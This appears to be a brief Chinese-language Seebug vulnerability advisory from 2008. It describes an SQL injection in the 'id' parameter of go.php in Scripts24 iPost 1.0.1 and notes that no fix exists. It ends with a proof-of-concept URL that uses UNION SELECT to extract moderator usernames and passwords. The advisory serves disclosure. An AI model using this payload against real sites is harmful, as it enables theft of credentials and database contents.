iPost 'go.php' SQL注入漏洞

2008-08-04T00:00:00
ID SSV:3777
Type seebug
Reporter Root
Modified 2008-08-04T00:00:00

Description

BUGTRAQ ID: 30504 CNCAN ID:CNCAN-2008080417

iPost是一款基于PHP的WEB应用程序。 iPost不正确处理用户提交的输入,远程攻击者可以利用漏洞进行SQL注入攻击,可能获得敏感信息或操作数据库。 问题由于'go.php'脚本对用户提交给'id'参数缺少过滤,构建恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。

Scripts24 iPost 1.0.1 目前没有解决方案提供: <a href=http://scripts24.com/ipost/index.php target=_blank>http://scripts24.com/ipost/index.php</a>

                                        
                                            
                                                http://www.example.com/go.php?action=report&amp;amp;id= Real id here +UNION+SELECT+010,CONCAT_ES(0x3a,username,password)MrSQL+FROM+itgp_moderator+limit+1,1--